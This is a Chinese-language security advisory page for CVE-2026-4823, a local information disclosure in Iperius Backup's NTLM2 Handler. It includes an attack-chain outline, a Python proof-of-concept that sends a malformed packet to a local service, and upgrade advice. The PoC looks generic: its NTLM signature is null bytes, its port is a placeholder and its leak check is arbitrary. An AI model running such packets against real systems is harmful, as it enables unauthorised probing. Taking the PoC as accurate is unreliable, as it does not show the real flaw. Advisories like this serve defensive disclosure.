IPBUF安全漏洞报告
English
CVE-2026-4823 CVSS 2.5 低危

CVE-2026-4823 Iperius Backup信息泄露漏洞

披露日期: 2026-03-25

漏洞信息

漏洞编号
CVE-2026-4823
漏洞类型
信息泄露
CVSS评分
2.5 低危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Enter Software Iperius Backup

相关标签

信息泄露Iperius Backup本地漏洞CVE-2026-4823NTLM

漏洞概述

Enter Software Iperius Backup 8.7.3及之前版本的NTLM2 Handler组件存在安全缺陷,攻击者可利用该漏洞导致信息泄露。该漏洞仅限于本地执行,攻击复杂度高且无需用户交互。目前已有公开的利用代码发布,厂商已发布修复版本,建议用户尽快升级至8.7.4或更高版本以消除风险。

技术细节

该漏洞源于Enter Software Iperius Backup软件中NTLM2 Handler组件对NTLM认证处理逻辑的不完善。在特定条件下,本地低权限攻击者可以通过执行复杂的操纵操作,触发组件中的信息泄露漏洞。攻击向量为本地(AV:L),攻击复杂度高(AC:H),且不需要用户交互(UI:N)。尽管利用难度较大,但成功利用后,攻击者可以读取部分机密信息(C:L),而不会影响系统的完整性和可用性。漏洞原理涉及NTLM中继或凭据处理过程中的不当边界检查,导致敏感数据暴露。

攻击链分析

STEP 1
侦察
攻击者确认目标系统上安装了 Enter Software Iperius Backup 软件,且版本低于或等于 8.7.3。
STEP 2
获取本地访问
攻击者获取目标机器的本地低权限用户访问权限(PR:L),这是发起攻击的前提条件。
STEP 3
触发漏洞
攻击者向 NTLM2 Handler 组件发送特制的恶意数据包或执行特定的本地操作,利用组件中的逻辑缺陷。
STEP 4
信息获取
成功利用漏洞后,攻击者从内存或响应中读取敏感信息(如凭据片段或内存布局),造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC Concept for CVE-2026-4823 (Local Information Disclosure) # This script is a conceptual demonstration of triggering the NTLM2 Handler flaw. # Note: Actual exploitation requires local access and specific environment conditions. import socket import struct import sys def send_malicious_ntlm_packet(target_ip, target_port): """ Sends a crafted packet to the local Iperius Backup service to trigger the information disclosure in NTLM2 Handler. """ try: print(f"[*] Connecting to {target_ip}:{target_port}...") # Establish a connection to the local vulnerable service sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) # Craft a malformed NTLM negotiation message # This payload is designed to trigger the buffer read overflow # leading to memory leak. payload = b"\x00" * 8 # Signature payload += b"\x01" * 4 # Message Type (Negotiate) payload += b"\xFF" * 4 # Flags (Malformed) payload += b"A" * 1024 # Padding to trigger read boundary issue print("[*] Sending malicious payload...") sock.sendall(payload) # Receive response response = sock.recv(4096) if response: print("[+] Response received:") print(response) # Check for leaked memory patterns (e.g., pointers, strings) if b"\x00\x00\x00\x00" in response or len(response) > 100: print("[!] Potential memory leak detected!") else: print("[-] No obvious leak detected in this attempt.") else: print("[-] No response from server.") sock.close() except Exception as e: print(f"[!] Error during exploitation: {e}") if __name__ == "__main__": # Target is localhost as this is a Local (AV:L) vulnerability TARGET_IP = "127.0.0.1" TARGET_PORT = 0000 # Replace with actual service port if known if len(sys.argv) > 1: TARGET_PORT = int(sys.argv[1]) else: print("Usage: python poc.py <port>") print("Attempting with default placeholder port...") send_malicious_ntlm_packet(TARGET_IP, TARGET_PORT)

影响范围

Enter Software Iperius Backup <= 8.7.3

防御指南

临时缓解措施
在无法立即升级的情况下,应严格限制对 Iperius Backup 服务的本地访问权限,仅允许受信任的管理员账户运行相关操作。同时,监控系统日志中关于 NTLM 认证的异常活动,以检测潜在的利用尝试。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表